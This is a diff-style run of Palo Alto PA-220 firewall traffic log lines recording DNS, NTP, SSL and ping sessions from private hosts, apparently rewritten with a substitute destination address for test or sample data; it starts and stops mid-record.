16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 
16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 
16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United 
States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 
16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 
1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 
